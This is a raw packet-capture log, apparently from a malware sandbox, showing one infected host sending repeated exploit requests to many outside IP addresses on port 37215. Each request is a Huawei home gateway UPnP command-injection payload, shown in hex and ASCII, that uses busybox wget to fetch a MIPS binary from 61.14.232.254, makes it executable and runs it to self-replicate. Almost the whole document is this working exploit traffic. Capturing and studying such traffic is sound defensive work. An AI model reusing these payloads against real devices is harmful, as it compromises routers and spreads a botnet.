3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2063192.168.2.134813641.248.202.9437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.689599037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2064192.168.2.1337292148.209.98.25137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.702366114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2065192.168.2.1355162197.177.234.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.702409983 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2066192.168.2.135914241.252.104.6337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.702430010 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2067192.168.2.133989641.133.222.9037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.702450991 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2068192.168.2.1337298197.93.223.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.702598095 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2069192.168.2.135109041.165.250.14837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.702747107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2070192.168.2.1350752157.143.143.4937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.703321934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2071192.168.2.1349648197.48.75.22037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.703396082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2072192.168.2.133667641.90.147.10937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.703430891 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2073192.168.2.135446041.61.52.14937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.703448057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
